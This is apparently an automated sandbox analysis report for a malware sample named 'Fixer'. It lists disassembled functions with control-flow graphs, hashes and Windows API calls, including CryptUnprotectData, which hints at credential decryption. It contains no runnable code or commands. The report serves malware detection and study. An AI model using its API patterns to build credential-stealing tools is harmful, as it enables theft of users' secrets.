                                                                                                                                                                                                                                                • API String ID: 0-1594803414
                                                                                                                                                                                                                                                • Opcode ID: e85788bc73a04ed927bd116eb72f345c233bfc2b6cc24e952dff0312278d2158
                                                                                                                                                                                                                                                • Instruction ID: 9085e285d20628fe4c9049454b2791b147648cf8b413e8af24b6ed8ab3369271
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e85788bc73a04ed927bd116eb72f345c233bfc2b6cc24e952dff0312278d2158
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1E1C1B4E10229CFDB54CFA9C884BEEBBB2FF49300F1485A9D808A7255D7749A85CF50
                                                                                                                                                                                                                                                Function 0623BC71 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 509 623bc71-623bc76 510 623bc78-623bcea CryptUnprotectData 509->510 511 623bcf3-623bd1b 510->511 512 623bcec-623bcf2 510->512 512->511
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0623BCDD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                                • Opcode ID: 01061b5336c0038194aa405883390d124074c1e7e15116347527d26fba039c46
                                                                                                                                                                                                                                                • Instruction ID: ef0d32769fd85f065fed31c347fdb1d0c64b058898b5f77e25aa5ca1fce99079
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01061b5336c0038194aa405883390d124074c1e7e15116347527d26fba039c46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B2147B68002499FDB20CF99D845BDEBFF5EF48320F148819E954A3250C339A594DFA5
                                                                                                                                                                                                                                                Function 0623B670 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0623BCDD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                                • Opcode ID: c5b874992b02e4407fa109e353ad30943bf8f3469d233c3814d859fc072fbab8
                                                                                                                                                                                                                                                • Instruction ID: d60f24d01957ac5b74305be99b8b3a7426394625b5461754d6bfdcfddc6ca3af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5b874992b02e4407fa109e353ad30943bf8f3469d233c3814d859fc072fbab8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C61159B6800249DFDB20CF9AC845BDEBBF4EF48320F148419E914A7250C379A994DFA0
                                                                                                                                                                                                                                                Function 029CD168 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD1F6
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 029CD233
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD270
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 029CD2C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 628273becc12f556e2b332ec207bbdc5ccd11c7c482d04c33ade1cd8d35416db
                                                                                                                                                                                                                                                • Instruction ID: 06743331f8c9dbe15f81fc7e29eec2150ade0fd052740e2f0523e27d32467bd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 628273becc12f556e2b332ec207bbdc5ccd11c7c482d04c33ade1cd8d35416db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 815158B09017498FDB14CFAAD989B9EBBF5FF48304F208469E409A7350D7789885CF66
                                                                                                                                                                                                                                                Function 029CD178 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD1F6
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 029CD233
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 029CD270
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 029CD2C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 1708641703b0ad099b5e3d8a5e5133993257a77e447c544b4d8311053acb6668
                                                                                                                                                                                                                                                • Instruction ID: d94d131cdeaff30be72dc1cde66b390d60c393b1c7b6007011879a4e6430b41e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1708641703b0ad099b5e3d8a5e5133993257a77e447c544b4d8311053acb6668
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA5158B09007498FDB14CFAAD588B9EBBF5FF48304F20C459E409A7350D7749885CB66
                                                                                                                                                                                                                                                Function 029CAEF0 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 331 29caef0-29caeff 332 29caf2b-29caf2f 331->332 333 29caf01-29caf0e call 29c9838 331->333 335 29caf31-29caf3b 332->335 336 29caf43-29caf84 332->336 339 29caf24 333->339 340 29caf10 333->340 335->336 342 29caf86-29caf8e 336->342 343 29caf91-29caf9f 336->343 339->332 386 29caf16 call 29cb188 340->386 387 29caf16 call 29cb178 340->387 342->343 344 29cafa1-29cafa6 343->344 345 29cafc3-29cafc5 343->345 347 29cafa8-29cafaf call 29ca8e4 344->347 348 29cafb1 344->348 350 29cafc8-29cafcf 345->350 346 29caf1c-29caf1e 346->339 349 29cb060-29cb120 346->349 352 29cafb3-29cafc1 347->352 348->352 381 29cb128-29cb153 GetModuleHandleW 349->381 382 29cb122-29cb125 349->382 353 29cafdc-29cafe3 350->353 354 29cafd1-29cafd9 350->354 352->350 357 29cafe5-29cafed 353->357 358 29caff0-29caff9 call 29ca8f4 353->358 354->353 357->358 362 29caffb-29cb003 358->362 363 29cb006-29cb00b 358->363 362->363 364 29cb00d-29cb014 363->364 365 29cb029-29cb036 363->365 364->365 367 29cb016-29cb026 call 29ca904 call 29ca914 364->367 372 29cb038-29cb056 365->372 373 29cb059-29cb05f 365->373 367->365 372->373 383 29cb15c-29cb170 381->383 384 29cb155-29cb15b 381->384 382->381 384->383 386->346 387->346
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 029CB146
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: f1a44f393a7b509fed7b3695cf304b78aac31728c061c617278b94abc7677605
                                                                                                                                                                                                                                                • Instruction ID: d62ffe8da1a5fb804b17e4336fb6ab8e74260cad3cc1dd5d17957b05c7aff604
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1a44f393a7b509fed7b3695cf304b78aac31728c061c617278b94abc7677605
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 507167B0A00B058FD724DF29D55179ABBF5BF88204F108A2DD48AD7B40D775E849CF92
                                                                                                                                                                                                                                                Function 029C4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 388 29c4248-29c5a01 CreateActCtxA 391 29c5a0a-29c5a64 388->391 392 29c5a03-29c5a09 388->392 399 29c5a66-29c5a69 391->399 400 29c5a73-29c5a77 391->400 392->391 399->400 401 29c5a88-29c5ab8 400->401 402 29c5a79-29c5a85 400->402 406 29c5a6a 401->406 407 29c5aba-29c5b3c 401->407 402->401 406->400
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029C59F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 8eebe7e87c30048f78d4d8890db92073e2da1c8102af254feb7205d6e463da20
                                                                                                                                                                                                                                                • Instruction ID: 11b010be454ac15fd2b2addbec1a53247555e705a156bb3157125cb676f68b73
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eebe7e87c30048f78d4d8890db92073e2da1c8102af254feb7205d6e463da20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841E3B1D00718CBEB24CFAAC88479DBBB5FF48304F64806AD409BB251D7756989CF91
                                                                                                                                                                                                                                                Function 029C5935 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 409 29c5935-29c593c 410 29c5944-29c5a01 CreateActCtxA 409->410 412 29c5a0a-29c5a64 410->412 413 29c5a03-29c5a09 410->413 420 29c5a66-29c5a69 412->420 421 29c5a73-29c5a77 412->421 413->412 420->421 422 29c5a88-29c5ab8 421->422 423 29c5a79-29c5a85 421->423 427 29c5a6a 422->427 428 29c5aba-29c5b3c 422->428 423->422 427->421
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029C59F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: db3abe5cd2396f958742845db8bdfa4c24489c421e3e04eab2e321c4c1ef36a4
                                                                                                                                                                                                                                                • Instruction ID: 4fb6d4e3878f37eea2c2a9f8542f2bf7a33138a68fe9630e11a7c55751afd2ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db3abe5cd2396f958742845db8bdfa4c24489c421e3e04eab2e321c4c1ef36a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241E2B1D00718CBEB24CFAAC88479DBBB5BF48304F64805AD419BB250D775694ACF51
                                                                                                                                                                                                                                                Function 029CD3B8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 480 29cd3b8-29cd3ba 481 29cd3c0-29cd454 DuplicateHandle 480->481 482 29cd45d-29cd47a 481->482 483 29cd456-29cd45c 481->483 483->482
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CD447
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: da83680a8e9ec7a22fb559a0d4434ee99f5b01a4eb0a1390611edd2190337fa3
                                                                                                                                                                                                                                                • Instruction ID: 94cc1d446b005be8e30c055eff478af90e43f37875fa0badcc9b1680c2921341
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da83680a8e9ec7a22fb559a0d4434ee99f5b01a4eb0a1390611edd2190337fa3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21E5B59002499FDB10CF9AD485ADEBFF5EB48314F14841AE918A3350D378A945CF65
                                                                                                                                                                                                                                                Function 029CD3C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 486 29cd3c0-29cd454 DuplicateHandle 487 29cd45d-29cd47a 486->487 488 29cd456-29cd45c 486->488 488->487
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029CD447
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: d4bdd635966abdf38cfd56e5990826677eb1a6f7e54626b4fd131da40cec16c9
                                                                                                                                                                                                                                                • Instruction ID: 94d6e6d23123f743ca6da8dc6a61a6b1f4417212d1e0eb8c68884dcf97590c8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4bdd635966abdf38cfd56e5990826677eb1a6f7e54626b4fd131da40cec16c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C21C4B59002499FDB10CF9AD884ADEFBF9EF48314F14841AE918A3350D378A954CF65
                                                                                                                                                                                                                                                Function 029C8324 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 491 29c8324-29c9aab 493 29c9aad-29c9ab0 491->493 494 29c9ab3-29c9ab7 491->494 493->494 495 29c9abf-29c9aeb FindWindowW 494->495 496 29c9ab9-29c9abc 494->496 497 29c9aed-29c9af3 495->497 498 29c9af4-29c9b08 495->498 496->495 497->498
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindWindowW.USER32(00000000,00000000), ref: 029C9ADE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 134000473-0
                                                                                                                                                                                                                                                • Opcode ID: 38cea83605ce19cd01cb58c8ce25821fbeac64f69f85ef12533a247af10845f5
                                                                                                                                                                                                                                                • Instruction ID: 861d396efcdfa206fab3fce9be8c30a7c4262e5394fccabf6c853311744c976b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38cea83605ce19cd01cb58c8ce25821fbeac64f69f85ef12533a247af10845f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 252122B5D013098FDB14CF9AC884AEEFBF8FB49314F24852ED419A7600C3B4A944CBA1
                                                                                                                                                                                                                                                Function 029C9A60 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 500 29c9a60-29c9aab 502 29c9aad-29c9ab0 500->502 503 29c9ab3-29c9ab7 500->503 502->503 504 29c9abf-29c9aeb FindWindowW 503->504 505 29c9ab9-29c9abc 503->505 506 29c9aed-29c9af3 504->506 507 29c9af4-29c9b08 504->507 505->504 506->507
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindWindowW.USER32(00000000,00000000), ref: 029C9ADE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 134000473-0
                                                                                                                                                                                                                                                • Opcode ID: 83ace303064151750dae8a220806b19bc9e23fe1db20e9efd2d907afc255910e
                                                                                                                                                                                                                                                • Instruction ID: 3ad3b719ae2c76cc3260a8715d75b6d06075ff88b67568e1ec3bfc3074fbdacb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83ace303064151750dae8a220806b19bc9e23fe1db20e9efd2d907afc255910e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 912110B5D013098FDB14CF9AC884AEEFBF4FB48324F24852ED819A7640D778A545CBA1
                                                                                                                                                                                                                                                Function 029CB0E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 029CB146
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: 6bffa9857e528f26a0b9fefbb8f74030c9fa3d84f54668efdfb81766fa94dee9
                                                                                                                                                                                                                                                • Instruction ID: 99f44b47aac786dc7e384d581152332ac101d6b42d6a957e2b98c73e567fb815
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bffa9857e528f26a0b9fefbb8f74030c9fa3d84f54668efdfb81766fa94dee9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E11D2B5D002498FDB10CF9AD845BDEFBF4AF89218F24841AD419A7710D379A545CFA1
                                                                                                                                                                                                                                                Function 0101D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599831946.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_101d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 965e5c7e80a59fdbead4905f02f62188a144c9c8820d7a2fc3994c8600afc4ec
                                                                                                                                                                                                                                                • Instruction ID: b99844123e5da758920dc82914188f2d47e7d06aedff8ce2c3c65f77c53e8a84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 965e5c7e80a59fdbead4905f02f62188a144c9c8820d7a2fc3994c8600afc4ec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A021D375604340EFDB16DF58D8C8B16BBA5EB84254F20C5ADE8894B24AC37AD447CB62
                                                                                                                                                                                                                                                Function 0101D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599831946.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_101d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8db0d82fd9024c3c9cf0f5ef55ab1a215306e395bd48d1efc1cde17bc68b43f9
                                                                                                                                                                                                                                                • Instruction ID: fd5b0bfda48bbb6a5fc1ba345e4bcfbc72c03c5431fed3b61e27f1516d78ab1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8db0d82fd9024c3c9cf0f5ef55ab1a215306e395bd48d1efc1cde17bc68b43f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46118E75504280DFDB12CF58D5C4B15BBA2FB44314F24C6AAE8494B65AC33AD44BCB62
                                                                                                                                                                                                                                                Function 0100DA51 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599778781.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_100d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 39a7d78a26d39a6ae4f22dbe6e896589ad5b40eac206363cf553f00b9156e54c
                                                                                                                                                                                                                                                • Instruction ID: c84d220f3b14895f5e6f5a240b0ded1c55dc8f11f180579abea39a42f55a2662
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a7d78a26d39a6ae4f22dbe6e896589ad5b40eac206363cf553f00b9156e54c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E018821108340ABF7125A99C884B66FFE8EF42674F18855AED850A2C2D3699884C776
                                                                                                                                                                                                                                                Function 0100DA50 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52599778781.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_100d000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 93626e89986fe086e6728d4042b5095d405e9b368a24f3c886a29cd08d29d98d
                                                                                                                                                                                                                                                • Instruction ID: c56c7160c281d4e54d094be2147f7db0cdf3044e062964c9f3a80adc58049092
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93626e89986fe086e6728d4042b5095d405e9b368a24f3c886a29cd08d29d98d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF04F71508344AEFB118A5AC9C4B62FFD8EB41634F18C55AED484A283C2799884CAB1

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 06235790 Relevance: 7.3, Strings: 5, Instructions: 1058COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4|q$Hq$Hq$Hq$Hq
                                                                                                                                                                                                                                                • API String ID: 0-2385035612
                                                                                                                                                                                                                                                • Opcode ID: 54330fef155eff867c620f1d5abd775f9f732f970c49ca4ae18653ae752af768
                                                                                                                                                                                                                                                • Instruction ID: d98d2968113ddfc6fa0cb995d4756643ea386cbf94702de842c7e88049bce4b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54330fef155eff867c620f1d5abd775f9f732f970c49ca4ae18653ae752af768
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1682BF70B202298FDB59DF79C8546AEBBF6BF88300F148069E849EB355DB749D41CB90
                                                                                                                                                                                                                                                Function 0623DBC8 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Hq
                                                                                                                                                                                                                                                • API String ID: 0-1594803414
                                                                                                                                                                                                                                                • Opcode ID: 6f94b1d877bfd4c4702eb4c996f623043802cb49f3604374120ddb7d1dc142c3
